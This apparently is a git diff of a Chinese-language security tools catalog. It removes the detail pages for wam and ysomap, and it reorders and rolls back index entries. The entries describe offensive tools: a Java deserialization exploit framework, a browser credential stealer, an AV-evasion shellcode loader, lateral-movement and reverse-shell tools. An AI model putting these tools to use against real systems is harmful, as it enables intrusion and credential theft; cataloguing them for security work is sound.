-```
-> 注: 使用 openAI 时，请确保当前网络能够访问openAI
-> 平行容器启动时，需要手动通过 docker run -e http_proxy=xxxx -e https_proxy=xxxx 设置代理（非全局代理的场景下）
-
-## 🔨 工具列表
-
-| 工具                                                                        | 功能                | 
-|---------------------------------------------------------------------------|-------------------|
-| [veinmind-runner](https://github.com/chaitin/veinmind-tools/blob/master/veinmind-runner/README.md)                              | 扫描工具运行宿主          |
-| [veinmind-malicious]https://github.com/chaitin/veinmind-tools/blob/master/plugins/go/veinmind-malicious)                       | 扫描容器/镜像中的恶意文件     |
-| [veinmind-weakpass](https://github.com/chaitin/veinmind-tools/blob/master/plugins/go/veinmind-weakpass)                         | 扫描容器/镜像中的弱口令      |
-| [veinmind-log4j2](https://github.com/chaitin/veinmind-tools/blob/master/plugins/go/veinmind-log4j2)                             | 扫描容器/镜像中的log4j2漏洞 |
-| [veinmind-minio](https://github.com/chaitin/veinmind-tools/blob/master/plugins/go/veinmind-minio)                               | 扫描容器/镜像中的minio漏洞  |
-| [veinmind-sensitive](https://github.com/chaitin/veinmind-tools/blob/master/plugins/go/veinmind-sensitive)                       | 扫描镜像中的敏感信息        |
-| [veinmind-backdoor](https://github.com/chaitin/veinmind-tools/blob/master/plugins/go/veinmind-backdoor)                         | 扫描镜像中的后门          |
-| [veinmind-history](https://github.com/chaitin/veinmind-tools/blob/master/plugins/python/veinmind-history)                       | 扫描镜像中的异常历史命令      |
-| [veinmind-vuln](https://github.com/chaitin/veinmind-tools/blob/master/plugins/go/veinmind-vuln)                                 | 扫描容器/镜像中的资产信息和漏洞  |
-| [veinmind-webshell](https://github.com/chaitin/veinmind-tools/blob/master/plugins/go/veinmind-webshell)                         | 扫描镜像中的 Webshell   |
-| [veinmind-unsafe-mount](https://github.com/chaitin/veinmind-tools/blob/master/plugins/go/veinmind-unsafe-mount)                 | 扫描容器中的不安全挂载目录     |
-| [veinmind-iac](https://github.com/chaitin/veinmind-tools/blob/master/plugins/go/veinmind-iac)                                   | 扫描镜像/集群的IaC文件     |
-| [veinmind-escape](https://github.com/chaitin/veinmind-tools/blob/master/plugins/go/veinmind-escape)                             | 扫描容器/镜像中的逃逸风险     |
-| [veinmind-privilege-escalation](https://github.com/chaitin/veinmind-tools/blob/master/plugins/go/veinmind-privilege-escalation) | 扫描容器/镜像中的提权风险     |
-| [veinmind-trace](https://github.com/chaitin/veinmind-tools/blob/master/plugins/go/veinmind-trace)                               | 扫描容器中的入侵痕迹        |
-
-PS: 目前所有工具均已支持平行容器的方式运行
-
-## 🧑‍💻 编写插件
-
-可以通过 example 快速创建一个 veinmind-tools 插件, 具体查看 [veinmind-example](https://github.com/chaitin/veinmind-tools/blob/master/example)  
-
-## ☁️ 云原生设施兼容性
-| 名称                                                          | 类别    | 是否兼容 |
-|-------------------------------------------------------------|-------|------|
-| [Jenkins](https://github.com/chaitin/veinmind-jenkins)      | CI/CD | ✔️   |
-| [Gitlab CI](https://veinmind.chaitin.com/docs/ci/gitlab/)   | CI/CD | ✔️   |
-| [Github Action](https://github.com/chaitin/veinmind-action) | CI/CD | ✔️   |
-| DockerHub                                                   | 镜像仓库  | ✔️   |
-| Docker Registry                                             | 镜像仓库  | ✔️   |
-| Harbor                                                      | 镜像仓库  | ✔️   |
-| Docker                                                      | 容器运行时 | ✔️   |
-| Containerd                                                  | 容器运行时 | ✔️   |
-| Kubernetes                                                  | 集群    | ✔️   |
-
-## 🛴 工作原理
-![](https://github.com/chaitin/veinmind-tools/raw/master/docs/architecture.png)
-
-<!--auto_detail_active_begin_e1c6fb434b6f0baf6912c7a1934f772b-->
-## 项目相关
-
-
-## 最近更新
-
-#### [v2.1.5] - 2023-07-26
-
-**新增**  
-- 新增 veinmind-trace 插件检查容器的攻击痕迹  
-- 使用 golang 重构 veinmind-backdoor 插件  
-- veinmind-backdoor 插件增加 rootkit 扫描  
-
-**其他**  
-- 更新 libveinmind 至 1.9.42 版本
-
-#### [v2.1.4] - 2023-07-04
-
-**新增**  
-- 添加 veinmind-privilege-escalation 插件，用于检测权限升级风险(包括suid/sudo)  
-
-**修复**  
-- 修复libveinmind步行数据竞争错误  
-- veinmind-weakpass 添加错误检查  
-- 修复文档中有关如何初始化插件的描述错误  
-- 修复 README 格式  
-
-**其他**  
-- libveinmind 更新至 1.9.21  
-- CI 添加自动同步到 harbor
-
-#### [v2.1.3] - 2023-05-23
-
-**新增**  
-- 新增 mysql5 弱口令扫描  
-- 使用 bullseye 和 libveinmind-dev 更新至 1.9.15   
-- 新增 caching_sha2_password 插件  
-- 新增 kubernetes iac 策略插件  
-- 新增对 env/docker 历史命令扫描  
-
-**修复**  
-- 修复 libveinmind 遍历数据竞争的问题  
-- 优化 veinmind-malicious 代码  
-- 修复 mysql8 弱口令检查
-
-#### [v2.1.2] - 2023-04-25
-
-**新增**  
-- veinmind-weakpass 添加支持 ftp  
-- veinmind-iac 添加 dockerfile 安全检测  
-
-**修复**  
-- AI模块忽略基本分析内容  
-- makefile 添加 CGO_ENBALED 参数和依赖更新  
-- 优化 CI/CD 的代理设置
-
-#### [v2.1.0] - 2023-03-27
-
-**更新**  
-- 支持使用 openai 分析扫描结果
-
-<!--auto_detail_active_end_f9cf7911015e9913b7e691a7a5878527-->
diff --git a/detail/wam.md b/detail/wam.md
deleted file mode 100644
index 422dc1677..000000000
--- a/detail/wam.md
+++ /dev/null
@@ -1,82 +0,0 @@
-## wam <https://github.com/knownsec/wam>
-<!--auto_detail_badge_begin_0b490ffb61b26b45de3ea5d7dd8a582e-->
-![Language](https://img.shields.io/badge/Language-Python-blue)
-![Author](https://img.shields.io/badge/Author-knownsec404-orange)
-![GitHub stars](https://img.shields.io/github/stars/knownsec/wam.svg?style=flat&logo=github)
-![Version](https://img.shields.io/badge/Version-V1.0-red)
-![Time](https://img.shields.io/badge/Join-20200821-green)
-<!--auto_detail_badge_end_fef74f2d7ea73fcc43ff78e05b1e7451-->
-
-
-### Introduction
-
-WAM is a platform powered by Python to monitor "Web App", "The dynamic network information". To a certain extent, it greatly help the security researchers save time on tracking the vulnerable code updates and industry dynamics of investment.
-
-- AM Model: This module can monitor every updates on all of apps on internet, analysising the changes to make Tag and provide mail notification;
-
-- IDM Model: This module uses Web crawler to fetch the industry dynamic information and report that to users;
-
-- VDR Model: This module manager all of application package in the history, and save the updated version of which DIFF details;
-
-### Development
-- Lang: Python 2.7
-- Framewrok: Django 1.7.11
-- UI: [Semantic-ui](http://www.semantic-ui.com/)
-- Database: Mysql
-
-### Models
-
-- AM (App Monitoring)
-- IDM (Information Dynamic Monitoring)
-- VDR (The Relationship Between Vulnerability And Database)
-
-#### App Monitoring
-
-#### Information Dynamic Monitoring
-
-#### The Relationship Between Vulnerability And Database
-
----
-### How to Use
----
-#### Step 1. Get WAM source code
-`git clone https://github.com/knownsec/wam.git`
-
-#### Step 2. Update settings
-update email server and user settings  
-**TODO  settings with dabase Storage**
-* `monitor/utils/local_settings.py`
-* `monitor/utils/email_list.py`
-  
-#### Step 3. Deploy to server
-* **nginx**  
-* **uwsgi**  
-* **supervisor**  
-  
-Just use `wam/conf` config files to deploy your wam code
-
-#### PS. WAM with LDAP auth
-
-Essentially, need to ensure you have the necessary development libraries installed:
-
-`apt-get install libsasl2-dev python-dev libldap2-dev libssl-dev`
-
-then `pip install python-ldap`
-and uncomment `wam/settings.py` 
-`AUTHENTICATION_BACKENDS` to
-
-````
-AUTHENTICATION_BACKENDS = (
-    'wam.ldap_backend.LDAPBackend', # 如果想使LDAP 认证取消注释
-    'django.contrib.auth.backends.ModelBackend',
-)
-````
-
-
-<!--auto_detail_active_begin_e1c6fb434b6f0baf6912c7a1934f772b-->
-## 项目相关
-
-
-## 最近更新
-
-<!--auto_detail_active_end_f9cf7911015e9913b7e691a7a5878527-->
diff --git a/detail/ysomap.md b/detail/ysomap.md
deleted file mode 100644
index 693e86cfd..000000000
--- a/detail/ysomap.md
+++ /dev/null
@@ -1,97 +0,0 @@
-## ysomap <https://github.com/wh1t3p1g/ysomap>
-<!--auto_detail_badge_begin_0b490ffb61b26b45de3ea5d7dd8a582e-->
-![Language](https://img.shields.io/badge/Language-Java-blue)
-![Author](https://img.shields.io/badge/Author-wh1t3p1g-orange)
-![GitHub stars](https://img.shields.io/github/stars/wh1t3p1g/ysomap.svg?style=flat&logo=github)
-![Version](https://img.shields.io/badge/Version-V0.1.3-red)
-![Time](https://img.shields.io/badge/Join-20211122-green)
-<!--auto_detail_badge_end_fef74f2d7ea73fcc43ff78e05b1e7451-->
-
-
-Ysomap是一款适配于各类实际复杂环境的Java反序列化利用框架，可动态配置具备不同执行效果的Java反序列化利用链payload，以应对不同场景下的反序列化利用。
-
-此外，ysomap支持多种exploits，用于生成或配置一些evil server，或者是常见漏洞的exp。
-```
-[+] exploits(11) payloads(31) bullets(28)
-```
-## #1 如何使用
-
-### 生成
-由于最新版XStream的payload需要JDK8的环境进行编译，所以后续运行需在JDK8的环境下运行
-
-使用`mvn clean package -DskipTests`
-
-生成的jar位于`cli/target/ysomap.jar`
-
-版本>=v0.0.1支持两种运行模式
-
-1. cli模式
-执行`java -jar ysomap.jar cli`,终端模式
-   
-2. script模式
-执行`java -jar ysomap.jar script /path/to/script.yso`，脚本模式
-
-ps: 后续版本为了适配XStream的相关gadget加入了很多jdk的对象，所以如果要使用xstream的gadget，ysomap最好运行在jdk8的环境下。
-### 基础使用方法
-
-参见[YSOMAP食用指北](https://github.com/wh1t3p1g/ysomap/wiki/YSOMAP%E9%A3%9F%E7%94%A8%E6%8C%87%E5%8C%97)
-
-## #2 当前进度
-
-### DONE
-
-- [x] 支持CommonsCollections系列payload
-- [x] 支持执行效果bullet：远程jar载入、命令执行、代码执行、发起jndi效果、tomcat内存马、延时判断、文件写入、socket shell。
-- [x] 支持现有RMI系列攻击包 [原理1](http://blog.0kami.cn/2020/02/06/rmi-registry-security-problem/) [原理2](http://blog.0kami.cn/2020/02/09/jndi-with-rmi/) [原理3](https://mogwailabs.de/blog/2020/02/an-trinhs-rmi-registry-bypass/)
-- [x] 支持现有LDAP系列攻击包 [原理](http://blog.0kami.cn/2020/03/01/jndi-with-ldap/)
-- [x] 支持HTTP服务动态挂载恶意的class文件或jar文件
-- [x] 支持URLDNS
-- [x] 支持现有JMX系列攻击包 [原理](http://blog.0kami.cn/2020/03/10/java-jmx-rmi/)
-- [x] 支持fastjson JdbcRowSetImpl、TemplatesImpl gadget [原理](http://blog.0kami.cn/2020/04/13/talk-about-fastjson-deserialization/)
-- [x] 支持现有XStream系列payload包 [原理](http://blog.0kami.cn/2020/04/18/talk-about-xstream-deserialization/)
-- [x] 支持weblogic XMLDecoder payloads
-
-### TODO
-
-- [ ] 支持weblogic系列攻击包
-- [ ] 支持websphere系列攻击包
-
-## #3 由来
-
-在实际分析ysoserial的利用链时，有时候会觉得框架写的太死，有以下几个缺点：
-
-1. 同一个利用链如果想改变一下最后的利用效果，如命令执行改成代码执行，我们需要改写这个利用链或者是重新增加一个利用链。这时，我们其实可以看到利用链的前半部分是不变的，变的只是后续的利用效果。
-2. ysoserial仅实现了常规的序列化利用链，对于类似JSON格式的序列化利用链，以当前的这个框架扩展起来会比较麻烦
-
-所以萌生了开发一个更加灵活的框架来扩展反序列化利用链，也就是当前这个试验品ysomap。
-
-PS：YSOMAP项目为另一个项目的子项目，后续将开源该项目，敬请期待......
-
-## #4 原理
-
-我将利用链切分成了两个部分**payload**和**bullet**：
-
-1. payload：指代利用链的前序部分
-2. bullet：指代最终利用链可达成的效果
-
-#### 实际案例分析
-
-CommonsCollection1和3，在分析时我们可以看到实际1和3的区别在于1使用的是`InvokerTransformer`，而3使用的是`templatesImpl`的方式。那么提取相同的前序payload部分，我们只需写两个不同的bullet即可。而且这两个bullet也同样能被用在其他的payload上。
-
-实际还有就是我在写RMIRegistryExploit时，也有这种可将不变部分重用的地方，而无需2,3之类的出现。
-
-
-<!--auto_detail_active_begin_e1c6fb434b6f0baf6912c7a1934f772b-->
-## 项目相关
-
-- 2021-11-24 发布文章[《ysomap : Java反序列化利用框架》](https://mp.weixin.qq.com/s/WluThXve9hLoJQ8hnyfLgA)
-
-## 最近更新
-
-#### [v0.1.3] - 2022-04-15
-
-**更新**  
-- 新增若干payloads、bullets，目前共计 [+] exploits(12) payloads(31) bullets(36)  
-- 支持设置编码器、输出方式、serialVersionUid、序列器类型，具体方法见wiki
-
-<!--auto_detail_active_end_f9cf7911015e9913b7e691a7a5878527-->
diff --git a/information_analysis.md b/information_analysis.md
index 4101fa57b..5383946f0 100644
--- a/information_analysis.md
+++ b/information_analysis.md
@@ -1,11 +1,10 @@
 ## 信息分析 / information_analysis
 
 1. [HackBrowserData](#hackbrowserdata)
-2. [KunLun-M](#kunlun-m)
-3. [frida-skeleton](#frida-skeleton)
-4. [java-object-searcher](#java-object-searcher)
-5. [MySQLMonitor](#mysqlmonitor)
-6. [CodeReviewTools](#codereviewtools)
+2. [frida-skeleton](#frida-skeleton)
+3. [java-object-searcher](#java-object-searcher)
+4. [MySQLMonitor](#mysqlmonitor)
+5. [CodeReviewTools](#codereviewtools)
 
 ----------------------------------------
 
@@ -13,27 +12,17 @@
 ![Author](https://img.shields.io/badge/Author-moonD4rk-orange)
 ![Language](https://img.shields.io/badge/Language-Golang-blue)
 ![GitHub stars](https://img.shields.io/github/stars/moonD4rk/HackBrowserData.svg?style=flat&logo=github)
-![Version](https://img.shields.io/badge/Version-V0.4.4-red)
+![Version](https://img.shields.io/badge/Version-V0.3.6-red)
 
 <https://github.com/moonD4rk/HackBrowserData>
 
 hack-browser-data 是一个解密浏览器数据（密码/历史记录/Cookies/书签）的导出工具，支持全平台主流浏览器的数据导出窃取。
 
-### [KunLun-M](detail/KunLun-M.md)
-![Author](https://img.shields.io/badge/Author-LoRexxar-orange)
-![Language](https://img.shields.io/badge/Language-Python-blue)
-![GitHub stars](https://img.shields.io/github/stars/LoRexxar/Kunlun-M.svg?style=flat&logo=github)
-![Version](https://img.shields.io/badge/Version-V2.6.5-red)
-
-<https://github.com/LoRexxar/Kunlun-M>
-
-KunLun-M是一个完全开源的静态白盒扫描工具，支持PHP、JavaScript的语义扫描，基础安全、组件安全扫描，Chrome Ext\Solidity的基础扫描。
-
 ### [frida-skeleton](detail/frida-skeleton.md)
 ![Author](https://img.shields.io/badge/Author-Margular-orange)
 ![Language](https://img.shields.io/badge/Language-Python-blue)
 ![GitHub stars](https://img.shields.io/github/stars/Margular/frida-skeleton.svg?style=flat&logo=github)
-![Version](https://img.shields.io/badge/Version-V3.3-red)
+![Version](https://img.shields.io/badge/Version-V2.0.0-red)
 
 <https://github.com/Margular/frida-skeleton>
 
diff --git a/intranet_tools.md b/intranet_tools.md
index f1600fdd7..2a12c0bc0 100644
--- a/intranet_tools.md
+++ b/intranet_tools.md
@@ -2,14 +2,10 @@
 
 1. [fscan](#fscan)
 2. [antSword](#antsword)
-3. [Stowaway](#stowaway)
-4. [shellcodeloader](#shellcodeloader)
-5. [ServerScan](#serverscan)
-6. [Platypus](#platypus)
-7. [WMIHACKER](#wmihacker)
-8. [rakshasa](#rakshasa)
-9. [As-Exploits](#as-exploits)
-10. [PortForward](#portforward)
+3. [ServerScan](#serverscan)
+4. [Stowaway](#stowaway)
+5. [Platypus](#platypus)
+6. [As-Exploits](#as-exploits)
 
 ----------------------------------------
 
@@ -17,7 +13,7 @@
 ![Author](https://img.shields.io/badge/Author-shadow1ng-orange)
 ![Language](https://img.shields.io/badge/Language-Golang-blue)
 ![GitHub stars](https://img.shields.io/github/stars/shadow1ng/fscan.svg?style=flat&logo=github)
-![Version](https://img.shields.io/badge/Version-V1.8.2-red)
+![Version](https://img.shields.io/badge/Version-V1.6.3-red)
 
 <https://github.com/shadow1ng/fscan>
 
@@ -27,32 +23,12 @@
 ![Author](https://img.shields.io/badge/Author-AntSwordProject-orange)
 ![Language](https://img.shields.io/badge/Language-Nodejs-blue)
 ![GitHub stars](https://img.shields.io/github/stars/AntSwordProject/antSword.svg?style=flat&logo=github)
-![Version](https://img.shields.io/badge/Version-V2.1.15-red)
+![Version](https://img.shields.io/badge/Version-V2.1.14-red)
 
 <https://github.com/AntSwordProject/antSword>
 
 中国蚁剑是一款开源的跨平台网站管理工具。
 
-### [Stowaway](detail/Stowaway.md)
-![Author](https://img.shields.io/badge/Author-ph4ntonn-orange)
-![Language](https://img.shields.io/badge/Language-Golang-blue)
-![GitHub stars](https://img.shields.io/github/stars/ph4ntonn/Stowaway.svg?style=flat&logo=github)
-![Version](https://img.shields.io/badge/Version-V2.1-red)
-
-<https://github.com/ph4ntonn/Stowaway>
-
-Stowaway 是一款多级代理工具，可将外部流量通过多个节点代理至内网，突破内网访问限制。Stowaway 可以方便渗透测试人员通过多级跳跃，从外部dmz等一系列区域逐步深入核心网络；Stowaway 除了流量转发功能，还提供了端口复用、ssh隧道，流量伪装等专为渗透测试人员所用的功能。
-
-### [shellcodeloader](detail/shellcodeloader.md)
-![Author](https://img.shields.io/badge/Author-m0ngo0se@knownsec404-orange)
-![Language](https://img.shields.io/badge/Language-C++-blue)
-![GitHub stars](https://img.shields.io/github/stars/knownsec/shellcodeloader.svg?style=flat&logo=github)
-![Version](https://img.shields.io/badge/Version-V1.1-red)
-
-<https://github.com/knownsec/shellcodeloader>
-
-Windows平台的shellcode免杀加载器，自带多种加载方式：32位自带13种加载方式，64位自带12种加载方式。
-
 ### [ServerScan](detail/ServerScan.md)
 ![Author](https://img.shields.io/badge/Author-Adminisme-orange)
 ![Language](https://img.shields.io/badge/Language-Golang-blue)
@@ -63,6 +39,16 @@ Windows平台的shellcode免杀加载器，自带多种加载方式：32位自
 
 一款使用Golang开发且适用于攻防演习内网横向信息收集的高并发网络扫描、服务探测工具。
 
+### [Stowaway](detail/Stowaway.md)
+![Author](https://img.shields.io/badge/Author-ph4ntonn-orange)
+![Language](https://img.shields.io/badge/Language-Golang-blue)
+![GitHub stars](https://img.shields.io/github/stars/ph4ntonn/Stowaway.svg?style=flat&logo=github)
+![Version](https://img.shields.io/badge/Version-V2.0.0-red)
+
+<https://github.com/ph4ntonn/Stowaway>
+
+Stowaway 是一款多级代理工具，可将外部流量通过多个节点代理至内网，突破内网访问限制。Stowaway 可以方便渗透测试人员通过多级跳跃，从外部dmz等一系列区域逐步深入核心网络；Stowaway 除了流量转发功能，还提供了端口复用、ssh隧道，流量伪装等专为渗透测试人员所用的功能。
+
 ### [Platypus](detail/Platypus.md)
 ![Author](https://img.shields.io/badge/Author-WangYihang-orange)
 ![Language](https://img.shields.io/badge/Language-Golang-blue)
@@ -73,26 +59,6 @@ Windows平台的shellcode免杀加载器，自带多种加载方式：32位自
 
 Platypus 是一个基于终端与 Web UI 交互式的反弹 Shell 会话管理工具。在实际的渗透测试中，为了解决 Netcat/Socat 等工具在文件传输、多会话管理方面的不足。该工具在多会话管理的基础上增加了在渗透测试中更加有用的功能，可以更方便灵活地对反弹 Shell 会话进行管理。
 
-### [WMIHACKER](detail/WMIHACKER.md)
-![Author](https://img.shields.io/badge/Author-rootclay-orange)
-![Language](https://img.shields.io/badge/Language-VBScript-blue)
-![GitHub stars](https://img.shields.io/github/stars/rootclay/WMIHACKER.svg?style=flat&logo=github)
-![Version](https://img.shields.io/badge/Version-V0.0.1-red)
-
-<https://github.com/rootclay/WMIHACKER>
-
-WMIHACKER是一款免杀横向渗透远程命令执行工具，常见的WMIEXEC、PSEXEC执行命令是创建服务或调用Win32_Process.create执行命令，这些方式都已经被杀软100%拦截，通过改造出的WMIHACKER可免杀横向移动。并且在企业网络目前阻断445端口严重的情况下可以无需445端口进行横向移动，效率高且不易被检测。
-
-### [rakshasa](detail/rakshasa.md)
-![Author](https://img.shields.io/badge/Author-Mob2003-orange)
-![Language](https://img.shields.io/badge/Language-Golang-blue)
-![GitHub stars](https://img.shields.io/github/stars/Mob2003/rakshasa.svg?style=flat&logo=github)
-![Version](https://img.shields.io/badge/Version-V0.2.3-red)
-
-<https://github.com/Mob2003/rakshasa>
-
-rakshasa是一个使用Go语言编写的强大多级代理工具，专为实现多级代理，内网穿透而设计。它可以在节点群里面任意两个节点之间转发TCP请求和响应，同时支持socks5代理，http代理，并且可以引入外部http、socks5代理池，自动切换请求IP。
-
 ### [As-Exploits](detail/As-Exploits.md)
 ![Author](https://img.shields.io/badge/Author-yzddmr6-orange)
 ![Language](https://img.shields.io/badge/Language-JavaScript-blue)
@@ -103,13 +69,3 @@ rakshasa是一个使用Go语言编写的强大多级代理工具，专为实现
 
 中国蚁剑后渗透框架
 
-### [PortForward](detail/PortForward.md)
-![Author](https://img.shields.io/badge/Author-knownsec404-orange)
-![Language](https://img.shields.io/badge/Language-Golang-blue)
-![GitHub stars](https://img.shields.io/github/stars/knownsec/PortForward.svg?style=flat&logo=github)
-![Version](https://img.shields.io/badge/Version-V0.5.0-red)
-
-<https://github.com/knownsec/PortForward>
-
-PortForward 是使用 Golang 进行开发的端口转发工具，解决在某些场景下内外网无法互通的问题
-
diff --git a/others.md b/others.md
index 4c0688c2b..d70f45b3f 100644
--- a/others.md
+++ b/others.md
@@ -1,71 +1,27 @@
 ## 其他 / others
 
-1. [f8x](#f8x)
-2. [BinAbsInspector](#binabsinspector)
-3. [passive-scan-client](#passive-scan-client)
-4. [Heimdallr](#heimdallr)
-5. [wam](#wam)
-6. [LBot](#lbot)
+1. [passive-scan-client](#passive-scan-client)
+2. [f8x](#f8x)
 
 ----------------------------------------
 
-### [f8x](detail/f8x.md)
-![Author](https://img.shields.io/badge/Author-ffffffff0x-orange)
-![Language](https://img.shields.io/badge/Language-Bash-blue)
-![GitHub stars](https://img.shields.io/github/stars/ffffffff0x/f8x.svg?style=flat&logo=github)
-![Version](https://img.shields.io/badge/Version-V1.6.2-red)
-
-<https://github.com/ffffffff0x/f8x>
-
-一款红/蓝队环境自动化部署工具,支持多种场景,渗透,开发,代理环境,服务可选项等。
-
-### [BinAbsInspector](detail/BinAbsInspector.md)
-![Author](https://img.shields.io/badge/Author-KeenSecurityLab-orange)
-![Language](https://img.shields.io/badge/Language-Java-blue)
-![GitHub stars](https://img.shields.io/github/stars/KeenSecurityLab/BinAbsInspector.svg?style=flat&logo=github)
-![Version](https://img.shields.io/badge/Version-V0.1-red)
-
-<https://github.com/KeenSecurityLab/BinAbsInspector>
-
-BinAbsInspector(Binary Abstract Inspector)是一款用于自动化逆向工程和扫描二进制文件漏洞的静态分析器，是 Keenlab 孵化的长期研究项目。基于 Ghidra 的支持下的抽象解释，适用于 Ghidra 的 Pcode 而非汇编。目前支持 x86、x64、armv7 和 aarch64 的二进制文件。
-
 ### [passive-scan-client](detail/passive-scan-client.md)
 ![Author](https://img.shields.io/badge/Author-c0ny1-orange)
 ![Language](https://img.shields.io/badge/Language-Java-blue)
 ![GitHub stars](https://img.shields.io/github/stars/c0ny1/passive-scan-client.svg?style=flat&logo=github)
-![Version](https://img.shields.io/badge/Version-V0.3.1-red)
+![Version](https://img.shields.io/badge/Version-V0.3.0-red)
 
 <https://github.com/c0ny1/passive-scan-client>
 
 Passive Scan Client是一款可以将经过筛选的流量转发到指定代理的Burp被动扫描流量转发插件
 
-### [Heimdallr](detail/Heimdallr.md)
-![Author](https://img.shields.io/badge/Author-graynjo-orange)
-![Language](https://img.shields.io/badge/Language-JavaScript-blue)
-![GitHub stars](https://img.shields.io/github/stars/graynjo/Heimdallr.svg?style=flat&logo=github)
-![Version](https://img.shields.io/badge/Version-V1.1.3-red)
-
-<https://github.com/graynjo/Heimdallr>
-
-一款完全被动监听的谷歌插件，用于高危指纹识别、蜜罐特征告警和拦截、机器特征对抗。
-
-### [wam](detail/wam.md)
-![Author](https://img.shields.io/badge/Author-knownsec404-orange)
-![Language](https://img.shields.io/badge/Language-Python-blue)
-![GitHub stars](https://img.shields.io/github/stars/knownsec/wam.svg?style=flat&logo=github)
-![Version](https://img.shields.io/badge/Version-V1.0-red)
-
-<https://github.com/knownsec/wam>
-
-WAM是一个由Python开发的用于监控'Web App'、'动态网络信息'的平台。在一定程度上，它极大地帮助安全研究人员节省了跟踪代码补丁的时间。
-
-### [LBot](detail/LBot.md)
-![Author](https://img.shields.io/badge/Author-LoRexxar@knownsec404-orange)
-![Language](https://img.shields.io/badge/Language-Python-blue)
-![GitHub stars](https://img.shields.io/github/stars/knownsec/LBot.svg?style=flat&logo=github)
-![Version](https://img.shields.io/badge/Version-V0.0.1-red)
+### [f8x](detail/f8x.md)
+![Author](https://img.shields.io/badge/Author-ffffffff0x-orange)
+![Language](https://img.shields.io/badge/Language-Bash-blue)
+![GitHub stars](https://img.shields.io/github/stars/ffffffff0x/f8x.svg?style=flat&logo=github)
+![Version](https://img.shields.io/badge/Version-V1.5.7-red)
 
-<https://github.com/knownsec/LBot>
+<https://github.com/ffffffff0x/f8x>
 
-LBot主要用于方便的编写一个xss的bot程序。使用者可以简单的修改其逻辑以及配置环境，即可获得一个简单的xss的bot程序。由于原型来自于爬虫程序，所以只要前端有一定的频率限制，后端很难出现问题，比较稳定。
+一款红/蓝队环境自动化部署工具,支持多种场景,渗透,开发,代理环境,服务可选项等。
 
diff --git a/party_a.md b/party_a.md
index 27ce274fe..02ca0cd3d 100644
--- a/party_a.md
+++ b/party_a.md
@@ -1,28 +1,22 @@
 ## 甲方工具 / party_a
 
-1. [dperf](#dperf)
+1. [OpenStar](#openstar)
 2. [Elkeid](#elkeid)
 3. [linglong](#linglong)
-4. [veinmind-tools](#veinmind-tools)
-5. [appshark](#appshark)
-6. [OpenStar](#openstar)
-7. [camille](#camille)
-8. [murphysec](#murphysec)
-9. [GShark](#gshark)
-10. [Juggler](#juggler)
-11. [Hades](#hades)
+4. [gshark](#gshark)
+5. [Juggler](#juggler)
 
 ----------------------------------------
 
-### [dperf](detail/dperf.md)
-![Author](https://img.shields.io/badge/Author-Benjamin-orange)
-![Language](https://img.shields.io/badge/Language-C-blue)
-![GitHub stars](https://img.shields.io/github/stars/baidu/dperf.svg?style=flat&logo=github)
-![Version](https://img.shields.io/badge/Version-V1.5.0-red)
+### [OpenStar](detail/OpenStar.md)
+![Author](https://img.shields.io/badge/Author-starjun-orange)
+![Language](https://img.shields.io/badge/Language-JS/Python-blue)
+![GitHub stars](https://img.shields.io/github/stars/starjun/openstar.svg?style=flat&logo=github)
+![Version](https://img.shields.io/badge/Version-V1.0.0-red)
 
-<https://github.com/baidu/dperf>
+<https://github.com/starjun/openstar>
 
-dperf 是一个100Gbps的网络性能与压力测试软件。国内多个知名安全厂商用dperf测试其防火墙。知名开源四层负载均衡DPVS在用dperf做性能测试，发布性能测试报告。
+OpenStar 是一个基于 OpenResty 的高性能 Web 应用防火墙，支持复杂规则编写。提供了常规的 HTTP 字段规则配置，还提供了 IP 黑白名单、访问频次等配置，对于 CC 防护更提供的特定的规则算法，并且支持搭建集群进行防护。
 
 ### [Elkeid](detail/Elkeid.md)
 ![Author](https://img.shields.io/badge/Author-bytedance-orange)
@@ -44,65 +38,15 @@ Elkeid是一个云原生的基于主机的安全(入侵检测与风险识别)解
 
 linglong是一款甲方资产巡航扫描系统。系统定位是发现资产，进行端口爆破。帮助企业更快发现弱口令问题。主要功能包括: 资产探测、端口爆破、定时任务、管理后台识别、报表展示。
 
-### [veinmind-tools](detail/veinmind-tools.md)
-![Author](https://img.shields.io/badge/Author-长亭科技-orange)
-![Language](https://img.shields.io/badge/Language-Golang/Python-blue)
-![GitHub stars](https://img.shields.io/github/stars/chaitin/veinmind-tools.svg?style=flat&logo=github)
-![Version](https://img.shields.io/badge/Version-V2.1.5-red)
-
-<https://github.com/chaitin/veinmind-tools>
-
-veinmind-tools 是基于 veinmind-sdk 打造的一个容器安全工具集，目前已支持镜像 恶意文件/后门/敏感信息/弱口令 的扫描，更多功能正在逐步开发中。
-
-### [appshark](detail/appshark.md)
-![Author](https://img.shields.io/badge/Author-bytedance-orange)
-![Language](https://img.shields.io/badge/Language-Kotlin-blue)
-![GitHub stars](https://img.shields.io/github/stars/bytedance/appshark.svg?style=flat&logo=github)
-![Version](https://img.shields.io/badge/Version-V0.1.2-red)
-
-<https://github.com/bytedance/appshark>
-
-Appshark 是一个针对安卓的静态分析工具，它的设计目标是针对超大型App的分析，Appshark支持基于json的自定义扫描规则,发现自己关心的安全漏洞以及隐私合规问题，支持灵活配置，可以在准确率以及扫描时间空间之间寻求平衡，支持自定义扩展规则，根据自己的业务需要，进行定制分析
-
-### [OpenStar](detail/OpenStar.md)
-![Author](https://img.shields.io/badge/Author-starjun-orange)
-![Language](https://img.shields.io/badge/Language-JS/Python-blue)
-![GitHub stars](https://img.shields.io/github/stars/starjun/openstar.svg?style=flat&logo=github)
-![Version](https://img.shields.io/badge/Version-V1.0.0-red)
-
-<https://github.com/starjun/openstar>
-
-OpenStar 是一个基于 OpenResty 的高性能 Web 应用防火墙，支持复杂规则编写。提供了常规的 HTTP 字段规则配置，还提供了 IP 黑白名单、访问频次等配置，对于 CC 防护更提供的特定的规则算法，并且支持搭建集群进行防护。
-
-### [camille](detail/camille.md)
-![Author](https://img.shields.io/badge/Author-zhengjim-orange)
-![Language](https://img.shields.io/badge/Language-Python-blue)
-![GitHub stars](https://img.shields.io/github/stars/zhengjim/camille.svg?style=flat&logo=github)
-![Version](https://img.shields.io/badge/Version-V0.0.1-red)
-
-<https://github.com/zhengjim/camille>
-
-现如今APP隐私合规十分重要，各监管部门不断开展APP专项治理工作及核查通报，不合规的APP通知整改或直接下架。camille可以hook住Android敏感接口，并识别是否为第三方SDK调用。根据隐私合规的场景，辅助检查是否符合隐私合规标准。
-
-### [murphysec](detail/murphysec.md)
-![Author](https://img.shields.io/badge/Author-murphysecurity-orange)
-![Language](https://img.shields.io/badge/Language-Golang-blue)
